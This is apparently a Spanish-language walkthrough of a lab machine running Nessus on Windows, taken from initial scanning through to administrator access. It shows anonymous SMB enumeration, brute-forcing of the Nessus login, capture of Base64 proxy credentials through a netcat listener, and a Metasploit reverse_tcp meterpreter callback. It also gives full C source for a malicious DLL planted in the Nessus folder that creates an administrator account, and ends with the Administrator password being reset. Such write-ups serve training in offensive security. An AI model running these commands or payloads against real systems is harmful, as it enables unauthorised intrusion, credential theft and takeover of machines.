Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-31 06:49 EDT
Nmap scan report for 192.168.1.164
Host is up (0.00053s latency).
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
8834/tcp open ssl/nessus-xmlrpc?
| ssl-cert: Subject: commonName=WIN-C05BOCC7F0H/organizationName=Nessus Users United/stateOrProvinceName=NY/countryName=US
| Not valid before: 2024-10-18T17:36:17
|_Not valid after: 2028-10-17T17:36:17
| fingerprint-strings:
| GetRequest:
| HTTP/1.1 200 OK
| Cache-Control: must-revalidate
| X-Frame-Options: DENY
| Content-Type: text/html
| ETag: 27393d29a7ce578108e0989bb8e5b05c
| Connection: close
| X-XSS-Protection: 1; mode=block
| Server: NessusWWW
| Date: Mon, 31 Mar 2025 10:50:02 GMT
| X-Content-Type-Options: nosniff
| Content-Length: 1217
| Content-Security-Policy: upgrade-insecure-requests; block-all-mixed-content; form-action 'self'; frame-ancestors 'none'; frame-src
https://store.tenable.com; default-src 'self'; connect-src 'self' www.tenable.com; script-src 'self' www.tenable.com; img-src 'self' data:; style-src 'self'
www.tenable.com; object-src 'none'; base-uri 'self';
| Strict-Transport-Security: max-age=31536000
| Expect-CT: max-age=0
| <!doctype html>
| <html lang="en">
| <head>
| <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" />
|_ <meta http-equiv="Content-Security-Policy" content="upgrade-inse
|_ssl-date: TLS randomness does not represent time
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49671/tcp open msrpc Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at
https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port8834-TCP:V=7.94SVN%T=SSL%I=7%D=3/31%Time=67EA7355%P=x86_64-pc-linux
SF:-gnu%r(GetRequest,788,"HTTP/1\.1\x20200\x20OK\r\nCache-Control:\x20must
SF:-revalidate\r\nX-Frame-Options:\x20DENY\r\nContent-Type:\x20text/html\r
SF:\nETag:\x2027393d29a7ce578108e0989bb8e5b05c\r\nConnection:\x20close\r\n
SF:X-XSS-Protection:\x201;\x20mode=block\r\nServer:\x20NessusWWW\r\nDate:\
SF:x20Mon,\x2031\x20Mar\x202025\x2010:50:02\x20GMT\r\nX-Content-Type-Optio
SF:ns:\x20nosniff\r\nContent-Length:\x201217\r\nContent-Security-Policy:\x
SF:20upgrade-insecure-requests;\x20block-all-mixed-content;\x20form-action
SF:\x20'self';\x20frame-ancestors\x20'none';\x20frame-src\x20https://store
SF:\.tenable\.com;\x20default-src\x20'self';\x20connect-src\x20'self'\x20w
SF:ww\.tenable\.com;\x20script-src\x20'self'\x20www\.tenable\.com;\x20img-
SF:src\x20'self'\x20data:;\x20style-src\x20'self'\x20www\.tenable\.com;\x2
SF:0object-src\x20'none';\x20base-uri\x20'self';\r\nStrict-Transport-Secur
SF:ity:\x20max-age=31536000\r\nExpect-CT:\x20max-age=0\r\n\r\n<!doctype\x2
SF:0html>\n<html\x20lang=\"en\">\n\x20\x20\x20\x20<head>\n\x20\x20\x20\x20
SF:\x20\x20\x20\x20<meta\x20http-equiv=\"X-UA-Compatible\"\x20content=\"IE
SF:=edge,chrome=1\"\x20/>\n\x20\x20\x20\x20\x20\x20\x20\x20<meta\x20http-e
SF:quiv=\"Content-Security-Policy\"\x20content=\"upgrade-inse");
MAC Address: 08:00:27:40:50:34 (Oracle VirtualBox virtual NIC)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2025-03-31T10:51:48
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
|_clock-skew: 5s
|_nbstat: NetBIOS name: NESSUS, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:40:50:34 (Oracle VirtualBox virtual NIC)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 144.77 seconds
Vemos lo que parece ser una pagina web en el puerto 8834 pero que va con SSL por lo que se tiene que utilizar HTTPS para entrar, tambien vemos el puerto de WinRM que nos podra servir para conectarnos de forma remota con algun usuario y veremos tambien interesante el servidor SMB el cual podremos ver que recursos compartidos hay, vamos a empezar entrando en la pagina web.
Si entramos de la siguiente forma:
URL = https://<IP>:8834/
Veremos lo siguiente:
Vemos que es el Software de Nessus por lo que no podremos hace mucho en esta parte de la pagina web, vamos a ver si se pudiera realizar un escaneo al servidor SMB de forma anonima.
SMB
smbclient -L //<IP>/ -N
Info:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
Documents Disk
IPC$ IPC Remote IPC
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 192.168.1.164 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
Vemos que funciono y veremos un recurso compartido que no viene por defecto llamado Documents, vamos a probar a entrar en el.
smbclient //<IP>/Documents
Veremos que funciona, por lo que vamos a listarlo a ver que nos encontramos.
. DR 0 Fri Oct 18 20:42:53 2024
.. D 0 Sat Oct 19 01:08:23 2024
desktop.ini AHS 402 Sat Jun 15 13:54:33 2024
My Basic Network Scan_hwhm7q.pdf A 122006 Fri Oct 18 18:19:59 2024
My Music DHSrn 0 Sat Jun 15 13:54:27 2024
My Pictures DHSrn 0 Sat Jun 15 13:54:27 2024
My Videos DHSrn 0 Sat Jun 15 13:54:27 2024
Web Application Tests_f6jg9t.pdf A 136025 Fri Oct 18 18:20:14 2024
12942591 blocks of size 4096. 10817065 blocks available
Nos vamos a descargar los dos PDFs:
get "My Basic Network Scan_hwhm7q.pdf"
get "Web Application Tests_f6jg9t.pdf"
Una vez pasados los PDFs si los abrimos veremos un reporte de Nessus pero que no veremos gran cosa o nada interesante, vamos a sacar los metadatos de dichos PDFs para ver si vemos algo.
Metadatos
exiftool My\ Basic\ Network\ Scan_hwhm7q.pdf
Info:
ExifTool Version Number : 13.00
File Name : My Basic Network Scan_hwhm7q.pdf
Directory : .
File Size : 122 kB
File Modification Date/Time : 2025:03:31 06:56:52-04:00
File Access Date/Time : 2025:03:31 06:56:52-04:00
File Inode Change Date/Time : 2025:03:31 06:56:52-04:00
File Permissions : -rw-r--r--
File Type : PDF
File Type Extension : pdf
MIME Type : application/pdf
Linearized : No
Page Count : 5
Profile CMM Type : Little CMS
Profile Version : 2.3.0
Profile Class : Display Device Profile
Color Space Data : RGB
Profile Connection Space : XYZ
Profile Date Time : 2004:08:13 12:18:06
Profile File Signature : acsp
Primary Platform : Microsoft Corporation
CMM Flags : Not Embedded, Independent
Device Manufacturer : Little CMS
Device Model :
Device Attributes : Reflective, Glossy, Positive, Color
Rendering Intent : Perceptual
Connection Space Illuminant : 0.9642 1 0.82491
Profile Creator : Little CMS
Profile ID : 7fb30d688bf82d32a0e748daf3dba95d
Device Mfg Desc : lcms generated
Profile Description : sRGB
Device Model Desc : sRGB
Media White Point : 0.95015 1 1.08826
Red Matrix Column : 0.43585 0.22238 0.01392
Blue Matrix Column : 0.14302 0.06059 0.71384
Green Matrix Column : 0.38533 0.71704 0.09714
Red Tone Reproduction Curve : (Binary data 2060 bytes, use -b option to extract)
Green Tone Reproduction Curve : (Binary data 2060 bytes, use -b option to extract)
Blue Tone Reproduction Curve : (Binary data 2060 bytes, use -b option to extract)
Chromaticity Channels : 3
Chromaticity Colorant : Unknown
Chromaticity Channel 1 : 0.64 0.33
Chromaticity Channel 2 : 0.3 0.60001
Chromaticity Channel 3 : 0.14999 0.06
Profile Copyright : no copyright, use freely
XMP Toolkit : Image::ExifTool 12.76
Date : 2024:10:18 15:10:05+02:00
Format : application/pdf
Language : x-unknown
Author : Jose
PDF Version : 1.4
Producer : Apache FOP Version 2.8
Create Date : 2024:10:18 15:10:05+02:00
Creator Tool : Apache FOP Version 2.8
Metadata Date : 2024:10:18 15:10:05+02:00
Page Mode : UseOutlines
Creator : Apache FOP Version 2.8
Entre los 2PDFs veremos que hay una opcion Author en la cual pone Jose por lo que podemos deducir que puede ser un nombre de usuario.
Vamos a probar a meter las credenciales probando la contraseña con el propio nombre de usuario en Nessus (jose:jose) pero veremos que son invalidas, por lo que vamos a realizar un poco de fuerza bruta por si pudieramos encontrar la contraseña de la posible cuenta de jose en Nessus.
FFUF
Si nosotros capturamos la peticion con BurpSuite al autenticarnos con cualquier credencial, para ver como se esta haciendo por detras, veremos lo siguiente:
Vemos que se esta enviando a una API de Nessus con el parametro session y en la peticion veremos lo siguiente:
Vemos que se esta realizando con dicha estructura, por lo que vamos a formar un comando con FFUF para realizar fuerza bruta con el usuario jose de la siguiente forma:
Por lo que vemos hemos obtenido las credenciales de dicho usuario, vamos a probarlas en Nessus
User: jose
Pass: tequiero
Vemos que si nos podemos loguear en Nessus y veremos que estamos dentro con la cuenta de jose en Nessus, pero si nos vamos a la siguiente ruta settings -> proxy-server.
URL = https://<IP>:8834/#/settings/proxy-server
Y veremos lo siguiente:
Vemos que hay un usuario que se llama nesus, por lo que podemos deducir que puede ser un usuario del sistema en la maquina Windows.
Vamos a realizar la prueba de Test Proxy Server cambiando la configuracion a nuestros requisitos como por ejemplo la IP y el Auth Method en BASIC pero antes de darle al boton, vamos a ponernos a la escucha de la siguiente forma:
Escalate user nesus
nc -lvnp 8080
Ahora le daremos al boton y veremos lo siguiente:
listening on [any] 8080 ...
connect to [192.168.1.146] from (UNKNOWN) [192.168.1.164] 49793
CONNECT plugins.nessus.org:443 HTTP/1.1
Proxy-Authorization: Basic bmVzdXM6WiNKdVhIJHBoLTt2QCxYJm1WKQ==
Host: plugins.nessus.org
Connection: keep-Alive
User-Agent: Nessus/10.7.3
Content-Length: 0
Proxy-Connection: Keep-Alive
Vemos que nos envia la contraseña de nessus en Base64, si lo decodificamos veremos lo siguiente:
Vemos que nos dice que si funciona, pero que ha expirado, por lo que esto es un fallo de la maquina, tendremos que cambiarlo de forma manual para actualizar la contraseña a la misma, haremos lo siguiente:
Nos vamos a la maquina Windows y le damos al siguiente boton:
Con esto desbloqueamos la maquina Windows y le damos varias veces al ESC para llegar a esta parte:
Pulsaremos en el usuario nesus y le daremos a password para meter la contraseña que expiro, el teclado esta en ingles por lo que tendremos que pulsar las teclas como si fuera teclado ingles es importante.
Una vez metido las credenciales correctas, nos pondra que expiro y que pongamos la nueva contraseña, por lo que repetiremos la misma contarseña y ya se cambiaria de forma correcta, ahora si probamos de nuevo veremos lo siguiente:
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\nesus\Documents> whoami
nessus\nesus
Veremos que ha funcionado y ya estaremos dentro de dicha maquina Windows mediante WinRM, por lo que leeremos la flag del usuario.
user.txt
72113f41d43e88eb5d67f732668bc3d1
Escalate Privileges
Si vemos que privilegios, grupos, etc... Tenemos veremos lo siguiente:
whoami /all
Info:
USER INFORMATION
----------------
User Name SID
============ ============================================
nessus\nesus S-1-5-21-2986980474-46765180-2505414164-1001
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
====================================== ================ ============ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account Well-known group S-1-5-113 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level Label S-1-16-8192
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
Vamos a obtener una shell mediante metasploit con meterpreter.
Antes de ejecutar la shell.ps1 vamos a ponernos a la escucha:
msfconsole -q
Vemos a utilizar el modulo de esucha:
use multi/handler
Ahora vamos a configurarlo de la siguiente forma:
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST <IP_ATTACKER>
set LPORT <PORT>
run
Ahora si podremos ejecutar el script de la reverse shell en la maquina victima.
.\shell.ps1
Ahora si volvemos a donde tenemos la escucha veremos lo siguiente:
[*] Started reverse TCP handler on 192.168.1.146:7777
[*] Sending stage (203846 bytes) to 192.168.1.164
[*] Meterpreter session 2 opened (192.168.1.146:7777 -> 192.168.1.164:49730) at 2025-04-01 06:19:34 -0400
meterpreter > getuid
Server username: NESSUS\nesus
Vemos que ha funcionado, por lo que vamos a dejar en segundo plano la sesion de la shell haciendo Ctrl+Z y dandole a Y.
Una vez echo esto, vamos a utilizar un modulo de metasploit para enumerar las diferentes vulnerabilidades a nivel local de la maquina victima Windows.
use post/multi/recon/local_exploit_suggester
Vamos a configurar el modulo de la siguiente forma:
set SESSION <ID_SESSION>
set SHOWDESCRIPTION true
exploit
Info:
[*] 192.168.1.164 - Collecting local exploits for x64/windows...
[*] 192.168.1.164 - 198 exploit checks are being tried...
[+] 192.168.1.164 - exploit/windows/local/bypassuac_dotnet_profiler: The target appears to be vulnerable.
Microsoft Windows allows for the automatic loading of a profiling
COM object during the launch of a CLR process based on certain
environment variables ostensibly to monitor execution. In this case,
we abuse the profiler by pointing to a payload DLL that will be
launched as the profiling thread. This thread will run at the
permission level of the calling process, so an auto-elevating
process will launch the DLL with elevated permissions. In this case,
we use gpedit.msc as the auto-elevated CLR process, but others would
work, too.
[+] 192.168.1.164 - exploit/windows/local/bypassuac_sdclt: The target appears to be vulnerable.
This module will bypass Windows UAC by hijacking a special key in
the Registry under the current user hive, and inserting a custom
command that will get invoked when Window backup and restore is
launched. It will spawn a second shell that has the UAC flag turned
off. This module modifies a registry key, but cleans up the key once
the payload has been invoked.
[+] 192.168.1.164 - exploit/windows/local/cve_2022_21882_win32k: The service is running, but could not be validated. May be vulnerable, but exploit not tested on Windows Server 2016+ Build 20348
A vulnerability exists within win32k that can be leveraged by an
attacker to escalate privileges to those of NT AUTHORITY\SYSTEM. The
flaw exists in how the WndExtra field of a window can be manipulated
into being treated as an offset despite being populated by an
attacker-controlled value. This can be leveraged to achieve an out
of bounds write operation, eventually leading to privilege
escalation. This flaw was originally identified as CVE-2021-1732 and
was patched by Microsoft on February 9th, 2021. In early 2022, a
technique to bypass the patch was identified and assigned
CVE-2022-21882. The root cause is is the same for both
vulnerabilities. This exploit combines the patch bypass with the
original exploit to function on a wider range of Windows 10 targets.
[+] 192.168.1.164 - exploit/windows/local/cve_2022_21999_spoolfool_privesc: The target appears to be vulnerable.
The Windows Print Spooler has a privilege escalation vulnerability
that can be leveraged to achieve code execution as SYSTEM. The
`SpoolDirectory`, a configuration setting that holds the path that a
printer's spooled jobs are sent to, is writable for all users, and
it can be configured via `SetPrinterDataEx()` provided the caller
has the `PRINTER_ACCESS_ADMINISTER` permission. If the
`SpoolDirectory` path does not exist, it will be created once the
print spooler reinitializes. Calling `SetPrinterDataEx()` with the
`CopyFiles\` registry key will load the dll passed in as the `pData`
argument, meaning that writing a dll to the `SpoolDirectory`
location can be loaded by the print spooler. Using a directory
junction and UNC path for the `SpoolDirectory`, the exploit writes a
payload to `C:\Windows\System32\spool\drivers\x64\4` and loads it by
calling `SetPrinterDataEx()`, resulting in code execution as SYSTEM.
[+] 192.168.1.164 - exploit/windows/local/cve_2023_28252_clfs_driver: The target appears to be vulnerable. The target is running windows version: 10.0.20348.0 which has a vulnerable version of clfs.sys installed by default
A privilege escalation vulnerability exists in the clfs.sys driver
which comes installed by default on Windows 10 21H2, Windows 11 21H2
and Windows Server 20348 operating systems. The clfs.sys driver
contains a function CreateLogFile that is used to create open and
edit '*.blf' (base log format) files. Inside a .blf file there are
multiple blocks of data which contain checksums to verify the
integrity of the .blf file and to ensure the file looks and acts
like a .blf file. However, these files can be edited with
CreateFileA or with fopen and then modified with WriteFile or fwrite
respectively in order to change the contents of the file and update
their checksums accordingly. This exploit makes use to two different
kinds of specially crafted .blf files that are edited using the
technique mentioned above. There are multiple spray .blf files. The
spray .blf files are specially crafted to initiate an out of bounds
read which reads from a contiguous block of memory. The block of
memory it reads from contains a read-write pipe that points to the
address of the second type of .blf file - the trigger .blf file. The
trigger .blf file is specially crafted read the SYSTEM token and
write it in the process of the exploit to achieve the local
privilege escalation. The exploits creates a controlled memory space
by first looping over the CreatePipe function to to create thousands
of read-write pipes (which take up 0x90 bytes of memory). It then
releases a certain number of pipes from memory and calls
CreateLogFile to open the pre-existing spray .blf files which when
being opened fill the 0x90 byte gaps created by the deallocation of
the pipes in memory, creating the controlled memory space. This is a
very brief and high overview description of what the exploit is
actually doing. For a more detailed and in depth analysis please
refer to the following
[reference](https://github.com/fortra/CVE-2023-28252).
[+] 192.168.1.164 - exploit/windows/local/cve_2024_30088_authz_basep: The target appears to be vulnerable. Version detected: Windows Server 2016+ Build 20348
CVE-2024-30088 is a Windows Kernel Elevation of Privilege
Vulnerability which affects many recent versions of Windows 10,
Windows 11 and Windows Server 2022. The vulnerability exists inside
the function called `AuthzBasepCopyoutInternalSecurityAttributes`
specifically when the kernel copies the
`_AUTHZBASEP_SECURITY_ATTRIBUTES_INFORMATION` of the current token
object to user mode. When the kernel preforms the copy of the
`SecurityAttributesList`, it sets up the list of the
SecurityAttribute's structure directly to the user supplied pointed.
It then calls `RtlCopyUnicodeString` and
`AuthzBasepCopyoutInternalSecurityAttributeValues` to copy out the
names and values of the `SecurityAttribute` leading to multiple Time
Of Check Time Of Use (TOCTOU) vulnerabilities in the function.
[*] Running check method for exploit 47 / 47
[*] 192.168.1.164 - Valid modules for session 2:
============================
# Name Potentially Vulnerable? Check Result
- ---- ----------------------- ------------
1 exploit/windows/local/bypassuac_dotnet_profiler Yes The target appears to be vulnerable.
2 exploit/windows/local/bypassuac_sdclt Yes The target appears to be vulnerable.
3 exploit/windows/local/cve_2022_21882_win32k Yes The service is running, but could not be validated. May be vulnerable, but exploit not tested on Windows Server 2016+ Build 20348
4 exploit/windows/local/cve_2022_21999_spoolfool_privesc Yes The target appears to be vulnerable.
5 exploit/windows/local/cve_2023_28252_clfs_driver Yes The target appears to be vulnerable. The target is running windows version: 10.0.20348.0 which has a vulnerable version of clfs.sys installed by default
6 exploit/windows/local/cve_2024_30088_authz_basep Yes The target appears to be vulnerable. Version detected: Windows Server 2016+ Build 20348
Pero no veremos nada interesante, ya que no funcionara ninguno, vamos a seguir buscando un poco en la maquina victima.
Veremos que podemos listar y entrar dentro de la carpeta Nessus junto con las .dll etc... Llegados a este punto lo que se nos puede ocurrir es realizar un secuestro de DLL contra el servicio de Nessus.
DLL Hijacking (Nessus Service)
Vamos a crear un .dll que agregara un nuevo usuario como administrador en la máquina victima Windows.
malicious.dll
#include <stdlib.h>
#include <windows.h>
// COMPILE
// x86_64-w64-mingw32-gcc adduser.c --shared -o adduser.dll
BOOL APIENTRY DllMain(
HANDLE hModule, // Handle to DLL module
DWORD ul_reason_for_call, // Reason for calling function
LPVOID lpReserved) // Reserved
{
switch (ul_reason_for_call) {
case DLL_PROCESS_ATTACH: // A process is loading the DLL.
// Ejecutar comandos para agregar un nuevo usuario y agregarlo a grupos específicos
system("net user hacker hacker /add"); // Crea el usuario 'hacker' con la contraseña 'hacker'
system("net localgroup administrators hacker /add"); // Añade el usuario 'hacker' al grupo 'Administrators'
system("net localgroup 'Remote Management Users' hacker /add"); // Añade al grupo 'Remote Management Users'
system("net localgroup 'Remote Desktop Users' hacker /add"); // Añade al grupo 'Remote Desktop Users'
break;
case DLL_THREAD_ATTACH: // A process is creating a new thread.
break;
case DLL_THREAD_DETACH: // A thread exits normally.
break;
case DLL_PROCESS_DETACH: // A process unloads the DLL.
break;
}
return TRUE;
}
Ahora vamos a movernos a la carpeta:
cd "C:\Program Files\Tenable\Nessus\"
Y nos lo pasaremos de la siguiente forma abriendo un servidor de python3:
Con esto ya tendremos el .dll en la carpeta de Nessus, ahora solo tendremos que cambiar el nombre de una de las .dll originales por la maliciosa de la siguiente forma:
Ahora si reiniciamos la maquina y probamos a entrar con el usuario que se supone que se ha tenido que crear llamado hacker veremos lo siguiente:
evil-winrm -i <IP> -u hacker -p 'hacker'
Info:
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\hacker\Documents> whoami
nessus\hacker
Vemos que ha funcionado, pero si listamos los permisos y privilegios que tenemos:
whoami /all
Info:
USER INFORMATION
----------------
User Name SID
============= ============================================
nessus\hacker S-1-5-21-2986980474-46765180-2505414164-1003
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
============================================================= ================ ============ ===============================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account and member of Administrators group Well-known group S-1-5-114 Mandatory group, Enabled by default, Enabled group
BUILTIN\Administrators Alias S-1-5-32-544 Mandatory group, Enabled by default, Enabled group, Group owner
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account Well-known group S-1-5-113 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level Label S-1-16-12288
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
========================================= ================================================================== =======
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Enabled
SeSecurityPrivilege Manage auditing and security log Enabled
SeTakeOwnershipPrivilege Take ownership of files or other objects Enabled
SeLoadDriverPrivilege Load and unload device drivers Enabled
SeSystemProfilePrivilege Profile system performance Enabled
SeSystemtimePrivilege Change the system time Enabled
SeProfileSingleProcessPrivilege Profile single process Enabled
SeIncreaseBasePriorityPrivilege Increase scheduling priority Enabled
SeCreatePagefilePrivilege Create a pagefile Enabled
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeDebugPrivilege Debug programs Enabled
SeSystemEnvironmentPrivilege Modify firmware environment values Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeRemoteShutdownPrivilege Force shutdown from a remote system Enabled
SeUndockPrivilege Remove computer from docking station Enabled
SeManageVolumePrivilege Perform volume maintenance tasks Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
SeTimeZonePrivilege Change the time zone Enabled
SeCreateSymbolicLinkPrivilege Create symbolic links Enabled
SeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session Enabled
Vemos que tenemos todo, incluido que estamos en el grupo Administradores por lo que podremos cambiar la contraseña al propio Administrador de la siguiente forma:
net user Administrator Password-
Info:
The command completed successfully.
Ahora si probamos a meternos con dicha cuenta y dicha contraseña:
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
nessus\administrator
Veremos que ha funcionado, por lo que leeremos la flag del admin.
